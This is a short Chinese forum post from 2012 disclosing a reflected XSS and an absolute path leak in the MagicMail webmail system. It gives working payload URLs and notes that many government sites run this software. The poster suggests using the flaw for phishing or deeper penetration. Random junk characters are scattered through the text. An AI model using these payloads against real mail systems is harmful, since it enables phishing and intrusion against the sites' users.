今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
, p' A) Z' C* v6 A f
% s3 q: ]6 l. p, [" g$ } 7 b) D. u2 [) f/ m
包含 一个反射性XSS 以及 绝对路径泄漏
& n" ~# K: A, t1 |看了看 貌似全部是linux的。3 x/ [4 f4 d' `( W9 z
0 ?; Y7 V8 U, V# I/ C5 F) p
关键字:迈捷邮件系统 by MagicMail: ~7 D; _$ I! e6 H4 H3 r2 b
1 h: c) b, _+ F: Q
可以看到很多政府网站都用这个邮件系统
0 ?$ H+ y# w6 _' V! c
1 b) s7 A6 F |7 g, c* B" x* f绝对路径 http://madman.in/index.php?login_type=declare&language=
3 O3 o8 Y- _% O2 d' Y# U; [6 u* \% `* I* ]) _! G4 L# |9 }
' k: S5 X6 k) ?3 c" r' @
. J5 ^# h" i) C
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
7 f3 I9 c) [4 o5 J5 E- L3 v7 V; X6 i* S* H: G# F5 S8 y% t
2 r1 [( \6 ]$ N* a# @. c& W" n) a4 U. x$ D$ f7 Z9 X
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
' |- a: r- q- A' n+ b- q- `
% ~, v$ r( g7 y+ j* M$ i修复方案:看官方补丁吧。
& u# z. t2 F9 y' V |
发表于 2012-11-9 20:38:41
收藏
支持
反对